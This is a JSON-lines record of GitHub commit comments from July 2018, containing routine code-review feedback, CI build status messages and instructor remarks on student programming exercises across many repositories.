{"id":"7922665054","type":"CommitCommentEvent","actor":{"login":"ppatierno"},"repo":{"name":"strimzi/strimzi-kafka-operator"},"payload":{"comment":{"id":29605148,"position":18,"line":18,"path":"docker-images/stunnel/scripts/stunnel_config_generator.sh","commit_id":"6077a7ffef80af4a335cd518f1cb9ee961afeffb","created_at":"2018-07-05T11:39:36Z","updated_at":"2018-07-05T11:39:36Z","author_association":"MEMBER","body":"Thinking more, it turns out that this `CONNECTOR_PORT` needs to be defined upfront.\r\nWhen the CO is going to create the Zookeeper container and has to define the ports list, it cannot know what will be the \"index\" assigned so it cannot process \"port * 10 + node_count\" (the container is part of the Pod template so the \"index\" information is known just at runtime as for you in the script). My suggestion is just to use 28880 and 38880 as ports exposed by the Zookeeper container. Wdyt @kyguy and @scholzj ? Am I missing something ?"}},"created_at":"2018-07-05T11:39:36Z"}
{"id":"7922669145","type":"CommitCommentEvent","actor":{"login":"zapster"},"repo":{"name":"zapster/slack-lunchbot"},"payload":{"comment":{"id":29605154,"position":62,"line":73,"path":"README.md","commit_id":"146ae608e552bd22f33b690e867ccbe7c1058852","created_at":"2018-07-05T11:40:32Z","updated_at":"2018-07-05T11:40:32Z","author_association":"OWNER","body":"I think we need something like: https://github.com/UnitedIncome/serverless-local-schedule"}},"created_at":"2018-07-05T11:40:32Z"}
{"id":"7922674065","type":"CommitCommentEvent","actor":{"login":"chlister"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29605169,"position":85,"line":85,"path":"Vidly/Views/Rentals/New.cshtml","commit_id":"14e11134a3997f5ed00883856f32dde579137d27","created_at":"2018-07-05T11:41:37Z","updated_at":"2018-07-05T11:41:37Z","author_association":"NONE","body":"Had the same issue - i had forgotten the # at this line  $(\"#newRental\").submit(function (e) {"}},"created_at":"2018-07-05T11:41:37Z"}
{"id":"7922677864","type":"CommitCommentEvent","actor":{"login":"egorpugin"},"repo":{"name":"tesseract-ocr/tesseract"},"payload":{"comment":{"id":29605178,"position":4,"line":261,"path":"src/lstm/network.cpp","commit_id":"d27f5b58f93511f684f05c361fd0ee350fb1cd5d","created_at":"2018-07-05T11:42:25Z","updated_at":"2018-07-05T11:42:25Z","author_association":"CONTRIBUTOR","body":"Yes. The reason if someone will add a case after this default accidentally, you (he) might get wrong behavior."}},"created_at":"2018-07-05T11:42:25Z"}
{"id":"7922678180","type":"CommitCommentEvent","actor":{"login":"rb6502"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29605180,"position":null,"line":null,"path":null,"commit_id":"790009096b58d6554720fdaa657d8035e0774263","created_at":"2018-07-05T11:42:29Z","updated_at":"2018-07-05T11:42:29Z","author_association":"CONTRIBUTOR","body":"This killed my changes from https://github.com/mamedev/mame/commit/1bb565da36017f27a5c844969d914cd76d920405 which I thought wasn't supposed to be possible with git :)"}},"created_at":"2018-07-05T11:42:29Z"}
{"id":"7922678574","type":"CommitCommentEvent","actor":{"login":"cereda"},"repo":{"name":"cereda/arara"},"payload":{"comment":{"id":29605182,"position":null,"line":null,"path":null,"commit_id":"a78aa4f6a2c6d0db554a6ae00996a1d955ba81e9","created_at":"2018-07-05T11:42:34Z","updated_at":"2018-07-05T11:42:34Z","author_association":"OWNER","body":"ooh :duck: "}},"created_at":"2018-07-05T11:42:34Z"}
{"id":"7922680623","type":"CommitCommentEvent","actor":{"login":"jandryuk"},"repo":{"name":"OpenXT/xenclient-oe"},"payload":{"comment":{"id":29605185,"position":16,"line":143,"path":"recipes-openxt/openxt/openxt-measuredlaunch/seal-system","commit_id":"1a0432540f685a68695864c6655f0b8928225e02","created_at":"2018-07-05T11:43:02Z","updated_at":"2018-07-05T11:43:02Z","author_association":"CONTRIBUTOR","body":"Ah, yes, sorry.  I was thinking of the positive form, `*[f]*`, that breaks."}},"created_at":"2018-07-05T11:43:02Z"}
{"id":"7922682032","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18002/programming-term2"},"payload":{"comment":{"id":29605192,"position":null,"line":null,"path":null,"commit_id":"a7b1ae5e3d2afb3c8b6540ace4623a14f5e789b7","created_at":"2018-07-05T11:43:22Z","updated_at":"2018-07-05T11:43:22Z","author_association":"NONE","body":"コミットを3回に分けていますが、手間になるので、次回から講義内容のソースのコミットは\r\n1回にしましょうね。"}},"created_at":"2018-07-05T11:43:22Z"}
{"id":"7922683175","type":"CommitCommentEvent","actor":{"login":"vlobzakov"},"repo":{"name":"vlobzakov/docs"},"payload":{"comment":{"id":29605203,"position":null,"line":null,"path":null,"commit_id":"edf99c548f58d6b312fd373b229339bfccd24995","created_at":"2018-07-05T11:43:38Z","updated_at":"2018-07-05T11:43:38Z","author_association":"OWNER","body":"In the description of onBeforeInit events, there're two links to Slava's repos. I don't know whether it's critical or not?  \r\nExample:\r\nURL\r\ntype: update  \r\nname: \"Ability to dynamically determine UI in JPS\"  \r\nonBeforeInit: https://gist.githubusercontent.com/SlavaKatiukha/4160926fdd7df13ae097a5194d42023e/raw/eff5ffa6015b8f997bfa31558524033193b6092a/\r\nonInstall:  \r\nassert: \"'${settings.custom_field}' == 'test'\""}},"created_at":"2018-07-05T11:43:38Z"}
{"id":"7922683285","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29605206,"position":null,"line":null,"path":null,"commit_id":"ab1e7cb9e246705849902a2200e51f903a041f0c","created_at":"2018-07-05T11:43:39Z","updated_at":"2018-07-05T11:43:39Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering :: Packer Templates [Build 489](https://ci.hashicorp.engineering/viewLog.html?buildId=101379&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-05T11:43:39Z"}
{"id":"7922688740","type":"CommitCommentEvent","actor":{"login":"bogdanlupuro"},"repo":{"name":"DefinitelyTyped/DefinitelyTyped"},"payload":{"comment":{"id":29605222,"position":null,"line":null,"path":null,"commit_id":"8dfa12287ebf386b30a51000eb17107d127a3577","created_at":"2018-07-05T11:44:53Z","updated_at":"2018-07-05T11:44:53Z","author_association":"NONE","body":"I think this commit breaks the $controller api. From angularjs source it looks like:\r\n`return function $controller(expression, locals, later, ident)`\r\n\r\nShouldn't the last two params still be there?"}},"created_at":"2018-07-05T11:44:53Z"}
{"id":"7922694128","type":"CommitCommentEvent","actor":{"login":"ZhangYiJiang"},"repo":{"name":"nusmodifications/nusmods"},"payload":{"comment":{"id":29605234,"position":null,"line":null,"path":null,"commit_id":"8b1e795a5bb0e21e951ef52d6a104e0d6e1aa2c3","created_at":"2018-07-05T11:46:05Z","updated_at":"2018-07-05T11:46:05Z","author_association":"CONTRIBUTOR","body":"This shouldn't be necessary. Check that the tests using this are correctly mocking the config "}},"created_at":"2018-07-05T11:46:05Z"}
{"id":"7922695392","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29605237,"position":null,"line":null,"path":null,"commit_id":"ab1e7cb9e246705849902a2200e51f903a041f0c","created_at":"2018-07-05T11:46:21Z","updated_at":"2018-07-05T11:46:21Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering :: Packer Templates [Build 489](https://ci.hashicorp.engineering/viewLog.html?buildId=101379&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **UNKNOWN**\nSummary: Canceled (Exit code 137 (new)) Build time: 00:02:42"}},"created_at":"2018-07-05T11:46:21Z"}
{"id":"7922695398","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29605236,"position":null,"line":null,"path":null,"commit_id":"ab1e7cb9e246705849902a2200e51f903a041f0c","created_at":"2018-07-05T11:46:21Z","updated_at":"2018-07-05T11:46:21Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering :: Packer Templates [Build 490](https://ci.hashicorp.engineering/viewLog.html?buildId=101380&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-05T11:46:21Z"}
{"id":"7922696309","type":"CommitCommentEvent","actor":{"login":"manuel-uberti"},"repo":{"name":"manuel-uberti/.emacs.d"},"payload":{"comment":{"id":29605239,"position":null,"line":null,"path":null,"commit_id":"71cb5487a129952c1a8110d51cef665c88ef5eca","created_at":"2018-07-05T11:46:34Z","updated_at":"2018-07-05T11:46:34Z","author_association":"OWNER","body":"Great tips, thank you."}},"created_at":"2018-07-05T11:46:34Z"}
{"id":"7922698645","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29605242,"position":null,"line":null,"path":null,"commit_id":"ab1e7cb9e246705849902a2200e51f903a041f0c","created_at":"2018-07-05T11:47:05Z","updated_at":"2018-07-05T11:47:05Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering :: Packer Templates [Build 490](https://ci.hashicorp.engineering/viewLog.html?buildId=101380&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **UNKNOWN**\nSummary: Canceled (Exit code 137 (new)) Build time: 00:00:36"}},"created_at":"2018-07-05T11:47:05Z"}
{"id":"7922700442","type":"CommitCommentEvent","actor":{"login":"lijunyaan"},"repo":{"name":"lijunyaan/git_test"},"payload":{"comment":{"id":29605248,"position":null,"line":null,"path":null,"commit_id":"10cac1fdf923cbbd90177be47ea6e83321ed7b97","created_at":"2018-07-05T11:47:29Z","updated_at":"2018-07-05T11:47:29Z","author_association":"OWNER","body":"改的好。"}},"created_at":"2018-07-05T11:47:29Z"}
{"id":"7922704997","type":"CommitCommentEvent","actor":{"login":"ProgMmgGhoneim"},"repo":{"name":"ProgMmgGhoneim/Arabic-Sentiment-Analysis-NLP-and-ML-Paper-and-Test-"},"payload":{"comment":{"id":29605262,"position":null,"line":null,"path":null,"commit_id":"5273f4404a5cc171ddd703e1772ec3c1d2a1e745","created_at":"2018-07-05T11:48:28Z","updated_at":"2018-07-05T11:48:28Z","author_association":"OWNER","body":"Arabic sentiment paper"}},"created_at":"2018-07-05T11:48:28Z"}
{"id":"7922707394","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18003/programming-term2"},"payload":{"comment":{"id":29605265,"position":null,"line":null,"path":null,"commit_id":"0abe48bd2befd10e193837b63d5d067241348bdd","created_at":"2018-07-05T11:48:57Z","updated_at":"2018-07-05T11:48:57Z","author_association":"NONE","body":"quote-str.pyは授業中指示したものと違います。\r\nエスケープシーケンスの使い方を覚えて欲しかったので、教科書p.43中ほどの\"REPL\"の\r\n部分のコードを\"escape-seq.py\"という名前で作ってみてくださいという指示でした。\r\n(I can't play the guitar. とか I like \"Orange\". と出力するプログラムです。)\r\n\r\n時間があればやってみてください。"}},"created_at":"2018-07-05T11:48:57Z"}
{"id":"7922707576","type":"CommitCommentEvent","actor":{"login":"jasonwynn10"},"repo":{"name":"jasonwynn10/MiniBosses"},"payload":{"comment":{"id":29605266,"position":null,"line":null,"path":null,"commit_id":"a1571bd43fcec3e8a963e5cc2a012d0985849eb9","created_at":"2018-07-05T11:49:00Z","updated_at":"2018-07-05T11:49:00Z","author_association":"OWNER","body":"Your first issue doesn't involve this plugin. "}},"created_at":"2018-07-05T11:49:00Z"}
{"id":"7922707751","type":"CommitCommentEvent","actor":{"login":"Archerol"},"repo":{"name":"iTemes/264609-keksobooking"},"payload":{"comment":{"id":29605267,"position":17,"line":17,"path":"js/backend.js","commit_id":"4975dfcecde98787f66059000ffcd6a3cab5eb7a","created_at":"2018-07-05T11:49:02Z","updated_at":"2018-07-05T11:49:02Z","author_association":"NONE","body":"// TODO: Лучше переименовать в sendXhr / sendXHR\r\n"}},"created_at":"2018-07-05T11:49:02Z"}
{"id":"7922709084","type":"CommitCommentEvent","actor":{"login":"mmiszczyk"},"repo":{"name":"mmiszczyk/dfuzzer"},"payload":{"comment":{"id":29605269,"position":null,"line":null,"path":null,"commit_id":"5d24a0ff1d64d166a95fea0de7151244f8fb03f2","created_at":"2018-07-05T11:49:20Z","updated_at":"2018-07-05T11:49:20Z","author_association":"OWNER","body":"@vanhauser-thc thanks. I've noticed that too but haven't pushed changes yet because I encountered a different problem (when trying to use the df_fuzz_write_log() on every call, not just on failure). I think I'll push changes today anyway so that it doesn't break on pasing arguments and start an issue on the main repo about that other problem."}},"created_at":"2018-07-05T11:49:20Z"}
{"id":"7922710516","type":"CommitCommentEvent","actor":{"login":"roamabdul"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":29605272,"position":null,"line":null,"path":null,"commit_id":"b7c723c3c38c2c2ca9eb7067e34fb526052cfd34","created_at":"2018-07-05T11:49:40Z","updated_at":"2018-07-05T11:49:40Z","author_association":"NONE","body":"Did u find any solution?\n\nOn Sat, Jun 30, 2018, 12:45 AM Asmaa <notifications@github.com> wrote:\n\n> @roamabdul <https://github.com/roamabdul>\n> I have the same problem when i press the numbers button its crashes...\n> what's the wrong with the XML code\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/udacity/ud839_Miwok/commit/b7c723c3c38c2c2ca9eb7067e34fb526052cfd34#commitcomment-29549546>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AklONcFpBVJ3Hr_i4R82TAoQl6qH684Rks5uBoPzgaJpZM4LuJ8a>\n> .\n>\n"}},"created_at":"2018-07-05T11:49:40Z"}
{"id":"7922712665","type":"CommitCommentEvent","actor":{"login":"m1ari"},"repo":{"name":"m1ari/EverGreenCoin"},"payload":{"comment":{"id":29605280,"position":null,"line":null,"path":null,"commit_id":"6544a955d6714ed80a5605fa69b9f23c72057576","created_at":"2018-07-05T11:50:10Z","updated_at":"2018-07-05T11:50:10Z","author_association":"OWNER","body":"This also looks to affect compiling with PIE=1 on Debian/Ubuntu\r\n\r\nUseful breakdown of options in\r\nhttps://lists.debian.org/debian-devel/2016/05/msg00309.html\r\n\r\nIn summary fPIE adds some overhead and fPIC adds even more, either can be used for a static archive (as these are), if it might be changed to a shared library in future you need fPIC (unlikely in this case). Therefore fPIE is probably the right option for us."}},"created_at":"2018-07-05T11:50:10Z"}
{"id":"7922712864","type":"CommitCommentEvent","actor":{"login":"mkulesh"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29605281,"position":null,"line":null,"path":null,"commit_id":"9c34f865c185f8e186f883f998fc84043ad2627b","created_at":"2018-07-05T11:50:13Z","updated_at":"2018-07-05T11:50:13Z","author_association":"COLLABORATOR","body":"А почему убрали настройку канала у ДМА?\r\ntxDma.Init.Channel = device.txDma.channel;\r\nНеужели даже это по другому делается?"}},"created_at":"2018-07-05T11:50:13Z"}
{"id":"7922714688","type":"CommitCommentEvent","actor":{"login":"VickyFengYu"},"repo":{"name":"VickyFengYu/project"},"payload":{"comment":{"id":29605282,"position":null,"line":null,"path":null,"commit_id":"bddb811fca6d9bb3e0dae26ec187291f9d663b31","created_at":"2018-07-05T11:50:35Z","updated_at":"2018-07-05T11:50:35Z","author_association":"OWNER","body":"![enter image description here](http://wx4.sinaimg.cn/small/66865de2gy1fsz86rsf65j20iu0fqt9i.jpg)"}},"created_at":"2018-07-05T11:50:35Z"}
{"id":"7922715786","type":"CommitCommentEvent","actor":{"login":"fscoto"},"repo":{"name":"LoupVaillant/Monocypher"},"payload":{"comment":{"id":29605285,"position":null,"line":null,"path":null,"commit_id":"79f8285ea6cae0db2e906bf3eb65c8fcadabdaf8","created_at":"2018-07-05T11:50:49Z","updated_at":"2018-07-05T11:50:49Z","author_association":"NONE","body":"> called free() on those NULL pointers, which is undefined.\r\n\r\nIt's actually a well-defined special case. POSIX also copied that into its description of free(3). From the final C99 draft, § 7.20.3.2 (added bold):\r\n\r\n> The `free` function  causes  the  space  pointed  to  by `ptr` to  be  deallocated,  that  is,  made available for further allocation. **If `ptr` is a null pointer, no action occurs.**"}},"created_at":"2018-07-05T11:50:49Z"}
{"id":"7922717448","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29605287,"position":103,"line":103,"path":"examples_tests/28.Benchmark/main.cpp","commit_id":"21f1a16fd572f835488c5a87d2114d06411983fe","created_at":"2018-07-05T11:51:11Z","updated_at":"2018-07-05T11:51:11Z","author_association":"NONE","body":"this should be TEST_CASE 2"}},"created_at":"2018-07-05T11:51:11Z"}
{"id":"7922718737","type":"CommitCommentEvent","actor":{"login":"zalyotov"},"repo":{"name":"dGazizullin/News-Cataloge"},"payload":{"comment":{"id":29605292,"position":26,"line":14,"path":"index.php","commit_id":"0169db450acc47255f462a7aa9f712a849fb2c21","created_at":"2018-07-05T11:51:27Z","updated_at":"2018-07-05T11:51:27Z","author_association":"NONE","body":"Используй сеттеры для присвоения: $this->setFirstName($firstName);"}},"created_at":"2018-07-05T11:51:27Z"}
{"id":"7922722505","type":"CommitCommentEvent","actor":{"login":"zalyotov"},"repo":{"name":"dGazizullin/News-Cataloge"},"payload":{"comment":{"id":29605305,"position":33,"line":21,"path":"index.php","commit_id":"0169db450acc47255f462a7aa9f712a849fb2c21","created_at":"2018-07-05T11:52:13Z","updated_at":"2018-07-05T11:52:13Z","author_association":"NONE","body":"Добавляй в коммит только код и необходимые к коду комментарии"}},"created_at":"2018-07-05T11:52:13Z"}
{"id":"7922722865","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18006/programming-term2"},"payload":{"comment":{"id":29605306,"position":null,"line":null,"path":null,"commit_id":"1446b5a6c16d9617755c04a51b604f1668670240","created_at":"2018-07-05T11:52:17Z","updated_at":"2018-07-05T11:52:17Z","author_association":"NONE","body":"hanaya-var.py\r\n今後はコメント行も入れておいてくださいね。\r\n仕事になると、1つのソースコードを複数人で編集することがあります。\r\nその際、コメントで簡単な説明があると親切だったりします。"}},"created_at":"2018-07-05T11:52:17Z"}
{"id":"7922729080","type":"CommitCommentEvent","actor":{"login":"happppp"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29605315,"position":null,"line":null,"path":null,"commit_id":"790009096b58d6554720fdaa657d8035e0774263","created_at":"2018-07-05T11:53:34Z","updated_at":"2018-07-05T11:53:34Z","author_association":"MEMBER","body":"Doesn't look like a merge conflict-gone-wrong to me, but actually on purpse."}},"created_at":"2018-07-05T11:53:34Z"}
{"id":"7922729220","type":"CommitCommentEvent","actor":{"login":"zalyotov"},"repo":{"name":"dGazizullin/News-Cataloge"},"payload":{"comment":{"id":29605316,"position":24,"line":12,"path":"index.php","commit_id":"0169db450acc47255f462a7aa9f712a849fb2c21","created_at":"2018-07-05T11:53:36Z","updated_at":"2018-07-05T11:53:36Z","author_association":"NONE","body":"разделяй операторы условий пробелом для лучшего чтения (**_&&_**)"}},"created_at":"2018-07-05T11:53:36Z"}
{"id":"7922735094","type":"CommitCommentEvent","actor":{"login":"timogauweiler"},"repo":{"name":"shopware/shopware"},"payload":{"comment":{"id":29605321,"position":68,"line":68,"path":"themes/Frontend/Bare/frontend/detail/content.tpl","commit_id":"3f0b1b08f0fb94d34cdc274c15a1b108727a987e","created_at":"2018-07-05T11:54:51Z","updated_at":"2018-07-05T11:54:51Z","author_association":"NONE","body":"@tinect @mitelg https://github.com/shopware/shopware/pull/1702"}},"created_at":"2018-07-05T11:54:51Z"}
{"id":"7922737796","type":"CommitCommentEvent","actor":{"login":"0exp"},"repo":{"name":"nesaulov/surrealist"},"payload":{"comment":{"id":29605326,"position":9,"line":52,"path":"lib/surrealist/value_assigner.rb","commit_id":"1c80add151ca5459fd1e1a242f1a9274cd7672cc","created_at":"2018-07-05T11:55:26Z","updated_at":"2018-07-05T11:55:26Z","author_association":"NONE","body":"my job 😎"}},"created_at":"2018-07-05T11:55:26Z"}
{"id":"7922738058","type":"CommitCommentEvent","actor":{"login":"leofeyer"},"repo":{"name":"contao/core-bundle"},"payload":{"comment":{"id":29605330,"position":7,"line":61,"path":"src/Resources/contao/classes/DropZone.php","commit_id":"a87b6466dca4ac4b7842e91dce6acf440fc7b411","created_at":"2018-07-05T11:55:29Z","updated_at":"2018-07-05T11:55:29Z","author_association":"MEMBER","body":"I don't know. What's the advantage?"}},"created_at":"2018-07-05T11:55:29Z"}
{"id":"7922738222","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18008/programming-term2"},"payload":{"comment":{"id":29605331,"position":null,"line":null,"path":null,"commit_id":"e1264c6da6bf1298535d0ba4f0ce0baae61fa1df","created_at":"2018-07-05T11:55:31Z","updated_at":"2018-07-05T11:55:31Z","author_association":"NONE","body":"割引の計算の箇所で小数部の精度を合わせてるのがステキです!\r\n(1.0と0.1)\r\n綺麗なコードですね。\r\nP.S. 細かいですが、ギターはguitarです。"}},"created_at":"2018-07-05T11:55:31Z"}
{"id":"7922739371","type":"CommitCommentEvent","actor":{"login":"nhh"},"repo":{"name":"spring-projects/spring-data-mongodb"},"payload":{"comment":{"id":29605333,"position":null,"line":null,"path":null,"commit_id":"aab86d23c9eb37ef3d7db05d84327c9fe55b51d0","created_at":"2018-07-05T11:55:46Z","updated_at":"2018-07-05T11:55:46Z","author_association":"NONE","body":"I definitely will! 😊\r\n\r\nVon meinem iPhone gesendet\r\n\r\nAm 05.07.2018 um 09:58 schrieb Mark Paluch <notifications@github.com<mailto:notifications@github.com>>:\r\n\r\n\r\nGood catch. Care to file a ticket in https://jira.spring.io/browse/DATAMONGO and submit a pull request?\r\n\r\n—\r\nYou are receiving this because you commented.\r\nReply to this email directly, view it on GitHub<https://github.com/spring-projects/spring-data-mongodb/commit/aab86d23c9eb37ef3d7db05d84327c9fe55b51d0#commitcomment-29602638>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AM2Sft6gcwZxPgg06ohVuHNVK5JQOBpEks5uDccRgaJpZM4VDRVr>.\r\n"}},"created_at":"2018-07-05T11:55:46Z"}
{"id":"7922742510","type":"CommitCommentEvent","actor":{"login":"papandreou"},"repo":{"name":"bebraw/colorjoe"},"payload":{"comment":{"id":29605340,"position":null,"line":null,"path":null,"commit_id":"9a6fc7f4644797f0171726113a5bfe00bdf7b882","created_at":"2018-07-05T11:56:27Z","updated_at":"2018-07-05T11:56:27Z","author_association":"CONTRIBUTOR","body":"🤗"}},"created_at":"2018-07-05T11:56:27Z"}
{"id":"7922745496","type":"CommitCommentEvent","actor":{"login":"zalyotov"},"repo":{"name":"dGazizullin/News-Cataloge"},"payload":{"comment":{"id":29605344,"position":61,"line":33,"path":"index.php","commit_id":"0169db450acc47255f462a7aa9f712a849fb2c21","created_at":"2018-07-05T11:57:05Z","updated_at":"2018-07-05T11:57:05Z","author_association":"NONE","body":"1. разделяй объявление функций пустой строкой\r\n2. открывающую скобку после объявления функции или оставляй, или переноси на новую строку. Делай что-то одно.\r\nтак лучше читается код"}},"created_at":"2018-07-05T11:57:05Z"}
{"id":"7922748491","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18010/programming-term2"},"payload":{"comment":{"id":29605351,"position":null,"line":null,"path":null,"commit_id":"4cfe0312a5cf708295e3c6537317eaf67c433041","created_at":"2018-07-05T11:57:44Z","updated_at":"2018-07-05T11:57:44Z","author_association":"NONE","body":"細かいですが、guitarがquitarになっています。\r\nhanaya-var.pyは指示通りに組めていますね。OKです。"}},"created_at":"2018-07-05T11:57:44Z"}
{"id":"7922748574","type":"CommitCommentEvent","actor":{"login":"rosscado"},"repo":{"name":"rosscado/sample-cloud-native-toolchain-tutorial-20180629133344888"},"payload":{"comment":{"id":29605352,"position":null,"line":null,"path":null,"commit_id":"c1ea1a98d883ed720d696b371afe4cc883134621","created_at":"2018-07-05T11:57:45Z","updated_at":"2018-07-05T11:57:45Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/1247f01c-bedc-4b1d-b07f-4a2fec5865a7?env_id=ibm%3Ayp%3Aeu-gb \"cloud-native-toolchain-tutorial-20180629133344888\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/9ea8d3b8-5d78-4284-8c83-9db4a53f12a1?env_id=ibm%3Ayp%3Aeu-gb \"sample-cloud-native-toolchain-tutorial-20180629133344888\") deployed [sample-cloud-native-toolchain-tutorial-20180629133344888](https://github.com/rosscado/sample-cloud-native-toolchain-tutorial-20180629133344888/releases/tag/deploy-ibm-yp-eu-gb-deep-language-technology-test-20180705-115738 \"deploy-ibm-yp-eu-gb-deep-language-technology-test-20180705-115738\") to [test](https://console.bluemix.net/apps/8676dc42-d18e-4bea-a7df-ab49ccca06a8?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:deep-language-technology:test\"), including this commit"}},"created_at":"2018-07-05T11:57:45Z"}
{"id":"7922752796","type":"CommitCommentEvent","actor":{"login":"denispasin"},"repo":{"name":"olivdums/THP2.0"},"payload":{"comment":{"id":29605361,"position":4,"line":4,"path":"db/migrate/20180705102328_create_lessons.rb","commit_id":"d64aca2530853b2d3cc684f18e9b6985f8f6d5b0","created_at":"2018-07-05T11:58:40Z","updated_at":"2018-07-05T11:58:40Z","author_association":"COLLABORATOR","body":"Regarde dans la reading list pour le model. Y a des explications de comment ajouter des contraintes dans les migrations"}},"created_at":"2018-07-05T11:58:40Z"}
{"id":"7922752965","type":"CommitCommentEvent","actor":{"login":"zalyotov"},"repo":{"name":"dGazizullin/News-Cataloge"},"payload":{"comment":{"id":29605362,"position":107,"line":68,"path":"index.php","commit_id":"0169db450acc47255f462a7aa9f712a849fb2c21","created_at":"2018-07-05T11:58:42Z","updated_at":"2018-07-05T11:58:42Z","author_association":"NONE","body":"Везде должен быть один отступ, равынй 4-м пробелам\r\n![image](https://user-images.githubusercontent.com/11612087/42322110-e5b2ab02-8063-11e8-87cc-1e4a8d4dcc1d.png)\r\n"}},"created_at":"2018-07-05T11:58:42Z"}
{"id":"7922754825","type":"CommitCommentEvent","actor":{"login":"denispasin"},"repo":{"name":"olivdums/THP2.0"},"payload":{"comment":{"id":29605363,"position":4,"line":4,"path":"spec/models/lesson_spec.rb","commit_id":"d64aca2530853b2d3cc684f18e9b6985f8f6d5b0","created_at":"2018-07-05T11:59:07Z","updated_at":"2018-07-05T11:59:07Z","author_association":"COLLABORATOR","body":"Hum… Manque un peu de tests ;)"}},"created_at":"2018-07-05T11:59:07Z"}
{"id":"7922756239","type":"CommitCommentEvent","actor":{"login":"denispasin"},"repo":{"name":"olivdums/THP2.0"},"payload":{"comment":{"id":29605368,"position":1,"line":1,"path":"app/models/lesson.rb","commit_id":"d64aca2530853b2d3cc684f18e9b6985f8f6d5b0","created_at":"2018-07-05T11:59:26Z","updated_at":"2018-07-05T11:59:26Z","author_association":"COLLABORATOR","body":"Il manque les validations par ici :)"}},"created_at":"2018-07-05T11:59:26Z"}
{"id":"7922758841","type":"CommitCommentEvent","actor":{"login":"ctubio"},"repo":{"name":"ctubio/Krypto-trading-bot"},"payload":{"comment":{"id":29605375,"position":null,"line":null,"path":null,"commit_id":"da0d92c2304d44ac289f46bda2175b2b422515fe","created_at":"2018-07-05T12:00:00Z","updated_at":"2018-07-05T12:00:00Z","author_association":"OWNER","body":"for now *nothing new; but this afternoon i plan to also had calculated in advance the Price of next pingpong order like we do with Size of next pingpong; this way we dont need to loop all hitory of trades to fetch the price/size of the last trade in the opposite side.\r\n\r\n\r\n*nothing new means that before we did:\r\n```\r\n        for (mTrade &it: broker->orders.tradesHistory)\r\n          (it.side == mSide::Bid ? tradesBuy : tradesSell)[it.price] = it;\r\n          if (qp.safety == mQuotingSafety::PingPong)\r\n            (it.side == mSide::Ask ? buySize : sellSize) = it.quantity;\r\n        }\r\n```\r\nbut now we do:\r\n```\r\n            wallet->position.safety.recentTrades.insert(k.side, k.price, k.tradeQuantity);\r\n```\r\nand later:\r\n´´´\r\n      if (qp.safety == mQuotingSafety::PingPong) {\r\n        if (safety.recentTrades.lastBuySize)\r\n          safety.sellSize = safety.recentTrades.lastBuySize;\r\n        if (safety.recentTrades.lastSellSize)\r\n          safety.buySize = safety.recentTrades.lastSellSize;\r\n      }\r\n´´´"}},"created_at":"2018-07-05T12:00:00Z"}
{"id":"7922759217","type":"CommitCommentEvent","actor":{"login":"denispasin"},"repo":{"name":"olivdums/THP2.0"},"payload":{"comment":{"id":29605380,"position":3,"line":3,"path":"spec/factories/lessons.rb","commit_id":"d64aca2530853b2d3cc684f18e9b6985f8f6d5b0","created_at":"2018-07-05T12:00:05Z","updated_at":"2018-07-05T12:00:05Z","author_association":"COLLABORATOR","body":"La Factory est pas tres random. Essaye d'utiliser faker avec :)"}},"created_at":"2018-07-05T12:00:05Z"}
{"id":"7922759303","type":"CommitCommentEvent","actor":{"login":"lemmy"},"repo":{"name":"tlaplus/tlaplus"},"payload":{"comment":{"id":29605381,"position":null,"line":null,"path":null,"commit_id":"103204a62dabae2e68b8f728a11af50a64205dcf","created_at":"2018-07-05T12:00:07Z","updated_at":"2018-07-05T12:00:07Z","author_association":"MEMBER","body":"![hoverhelp-103204a62dabae2e68b8f728a11af50a64205dcf](https://user-images.githubusercontent.com/88777/42322087-a7e0946a-804a-11e8-9ee7-fa4be54aa7b2.gif)\r\n"}},"created_at":"2018-07-05T12:00:07Z"}
{"id":"7922759696","type":"CommitCommentEvent","actor":{"login":"zalyotov"},"repo":{"name":"dGazizullin/News-Cataloge"},"payload":{"comment":{"id":29605383,"position":122,"line":80,"path":"index.php","commit_id":"0169db450acc47255f462a7aa9f712a849fb2c21","created_at":"2018-07-05T12:00:11Z","updated_at":"2018-07-05T12:00:11Z","author_association":"NONE","body":"Разделяй свойства от методов пустой строкой"}},"created_at":"2018-07-05T12:00:11Z"}
